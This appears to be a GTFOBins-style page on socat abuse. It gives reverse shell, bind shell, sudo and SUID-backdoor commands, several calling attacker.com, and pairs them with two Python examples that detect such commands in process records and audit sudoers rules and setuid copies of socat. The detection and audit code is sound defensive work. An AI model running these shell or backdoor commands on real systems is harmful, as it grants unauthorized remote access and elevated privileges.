It can send back a reverse shell to a listening attacker to open remote network access.
Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
It can bind a shell to a local port to allow remote network access.
Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell.
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
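The reverse-shell and bind-shell invocations above share one signature that a defender can key on: a socat command line with one exec:/system: address that launches a shell and one tcp-connect or tcp-listen address. The following is an added detection example, not code from the page or from the socat or GTFOBins projects; it runs over constructed, simplified process-creation records (the uid=/euid=/cmd= layout is an assumption standing in for an auditd or EDR event) and classifies each socat command as a reverse shell, a bind shell, or benign, also noting whether it ran in a privileged context.

```python
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional

# socat address types that connect out, listen, or spawn a program
CONNECT_TYPES = {"tcp", "tcp4", "tcp6", "tcp-connect", "tcp4-connect", "tcp6-connect"}
LISTEN_TYPES = {"tcp-listen", "tcp-l", "tcp4-listen", "tcp4-l", "tcp6-listen", "tcp6-l"}
EXEC_TYPES = {"exec", "system"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}

# Constructed sample events (not real logs), one per line, in an assumed
# simplified key=value layout resembling an auditd/EDR process record.
SAMPLE_EVENTS = [
    'uid=1000 euid=1000 cmd="socat tcp-connect:attacker.example:12345 exec:sh,pty,stderr,setsid,sigint,sane"',
    'uid=1000 euid=1000 cmd="socat TCP-LISTEN:12345,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane"',
    'uid=1000 euid=0 cmd="sudo -E socat tcp-connect:attacker.example:12345 exec:sh,pty,stderr,setsid,sigint,sane"',
    'uid=1000 euid=0 cmd="./socat tcp-connect:attacker.example:12345 exec:sh,pty,stderr,setsid,sigint,sane"',
    'uid=1000 euid=1000 cmd="socat TCP-LISTEN:8080,fork TCP:backend.internal:80"',  # plain relay, benign
    'uid=1000 euid=1000 cmd="ls -la /tmp"',
]

EVENT_RE = re.compile(r'uid=(?P<uid>\d+)\s+euid=(?P<euid>\d+)\s+cmd="(?P<cmd>[^"]*)"')


@dataclass
class Finding:
    kind: str         # "reverse-shell" or "bind-shell"
    privileged: bool  # effective uid 0, or invoked through sudo
    via_sudo: bool
    cmd: str


def _basename(token: str) -> str:
    return token.rsplit("/", 1)[-1]


def _address_type(addr: str) -> str:
    # "TCP-LISTEN:12345,fork" -> "tcp-listen"
    return addr.split(":", 1)[0].lower()


def _exec_program(addr: str) -> str:
    # "exec:sh,pty,stderr" -> "sh"; "exec:/bin/bash -i,pty" -> "bash"
    body = addr.split(":", 1)[1] if ":" in addr else ""
    program = body.split(",", 1)[0].strip().split(" ", 1)[0]
    return _basename(program)


def classify_socat(cmd: str) -> Optional[str]:
    """Return 'reverse-shell', 'bind-shell', or None for a command line."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    names = [_basename(a) for a in argv]
    if "socat" not in names:
        return None
    # Everything after the socat token; dash-prefixed tokens are socat options
    # (note: options taking a value, e.g. "-b 1024", would need extra handling).
    rest = argv[names.index("socat") + 1:]
    addresses = [a for a in rest if not a.startswith("-")]
    if len(addresses) != 2:
        return None
    spawns_shell = any(
        _address_type(a) in EXEC_TYPES and _exec_program(a) in SHELLS for a in addresses
    )
    if not spawns_shell:
        return None
    types = {_address_type(a) for a in addresses}
    if types & CONNECT_TYPES:
        return "reverse-shell"
    if types & LISTEN_TYPES:
        return "bind-shell"
    return None


def analyze_events(events: List[str]) -> List[Finding]:
    """Parse each record, keep only shell-wrapping socat commands."""
    findings: List[Finding] = []
    for line in events:
        m = EVENT_RE.search(line)
        if not m:
            continue
        cmd = m.group("cmd")
        kind = classify_socat(cmd)
        if kind is None:
            continue
        via_sudo = _basename(shlex.split(cmd)[0]) == "sudo"
        privileged = via_sudo or int(m.group("euid")) == 0
        findings.append(Finding(kind, privileged, via_sudo, cmd))
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        flag = "PRIVILEGED " if f.privileged else ""
        print(f"{flag}{f.kind}: {f.cmd}")
```

The relay event (TCP-LISTEN to TCP) is deliberately left unflagged: socat is a legitimate port-forwarding tool, and alerting on every invocation produces noise. The shell-spawning exec:/system: address is the distinguishing feature, and the euid/sudo check separates the ordinary-user case from the privileged cases the page goes on to describe.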
It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.
Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
RHOST=attacker.com
RPORT=12345
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
It runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges, working as a SUID backdoor. If it is used to run commands, it only works on systems like Debian that allow the default sh shell to run with SUID privileges.
Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
sudo sh -c 'cp $(which socat) .; chmod +s ./socat'
RHOST=attacker.com
RPORT=12345
./socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
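Both privileged cases above rest on a configuration a defender can audit: a sudo rule that lets a user run socat (or ALL), and a copy of the binary somewhere on disk with the setuid bit set. The following is an added audit example, not code from the page or from the socat or GTFOBins projects. It parses a constructed sudoers excerpt for rules that grant socat, and checks (path, st_mode) entries for setuid regular files named socat; `walk_modes` produces such entries from a real directory tree, while the sample entries here are constructed so the logic runs offline.

```python
import os
import re
import stat
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Constructed sudoers excerpt (not from any real host).
SAMPLE_SUDOERS = """
Defaults env_reset
root    ALL=(ALL:ALL) ALL
bob     ALL=(ALL) NOPASSWD: /usr/bin/socat      # unrestricted socat, no password
carol   ALL=(ALL) /usr/bin/apt, /usr/bin/socat -V
dave    ALL=(ALL) /usr/bin/systemctl restart nginx
"""

# Constructed (path, st_mode) entries standing in for an os.walk() of a host.
SAMPLE_ENTRIES = [
    ("/usr/bin/socat", 0o100755),   # regular file, no setuid
    ("/home/bob/socat", 0o104755),  # regular file with setuid bit: a copied backdoor
    ("/usr/bin/sudo", 0o104755),    # legitimately setuid, but not socat
    ("/tmp/socat", 0o040755),       # a directory named socat, ignored
]


@dataclass
class SudoRule:
    user: str
    nopasswd: bool
    command: str


# user host=(runas) [TAG:]... commands
SUDO_SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.*)$"
)
TAG_RE = re.compile(r"^([A-Z]+):\s*")


def socat_sudo_rules(sudoers_text: str) -> List[SudoRule]:
    """Return sudo rules whose command is socat or the catch-all ALL."""
    rules: List[SudoRule] = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_SPEC_RE.match(line)
        if not m:
            continue
        rest = m.group("rest")
        nopasswd = False
        while True:                            # strip leading tags like NOPASSWD: / SETENV:
            tm = TAG_RE.match(rest)
            if not tm:
                break
            nopasswd = nopasswd or tm.group(1) == "NOPASSWD"
            rest = rest[tm.end():]
        for cmd in (c.strip() for c in rest.split(",")):
            if not cmd:
                continue
            program = cmd.split()[0]
            # Argument restrictions (e.g. "socat -V") still need manual review,
            # so every socat-granting rule is reported, not only the bare ones.
            if program == "ALL" or os.path.basename(program) == "socat":
                rules.append(SudoRule(m.group("user"), nopasswd, cmd))
    return rules


def suid_entries(entries: Iterable[Tuple[str, int]], name: Optional[str] = "socat") -> List[str]:
    """Paths of setuid regular files named `name` (any name when name is None)."""
    hits: List[str] = []
    for path, mode in entries:
        if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
            continue
        if name is None or os.path.basename(path) == name:
            hits.append(path)
    return hits


def walk_modes(root: str) -> Iterable[Tuple[str, int]]:
    """Yield (path, st_mode) for every file under root, for use with suid_entries."""
    for dirpath, _dirs, files in os.walk(root):
        for f in files:
            p = os.path.join(dirpath, f)
            try:
                yield p, os.lstat(p).st_mode
            except OSError:
                continue


if __name__ == "__main__":
    for r in socat_sudo_rules(SAMPLE_SUDOERS):
        print(f"sudo: {r.user} -> {r.command}{' (NOPASSWD)' if r.nopasswd else ''}")
    for p in suid_entries(SAMPLE_ENTRIES):
        print(f"setuid socat copy: {p}")
```

On a real host, `suid_entries(walk_modes("/"))` scans the whole tree, which matters because the copy-and-chmod pattern on this page places the setuid binary outside the usual bin directories. Pairing the two checks reflects the page's two privileged paths: a sudo rule grants socat directly, while a stray setuid copy persists after the original sudo access is gone.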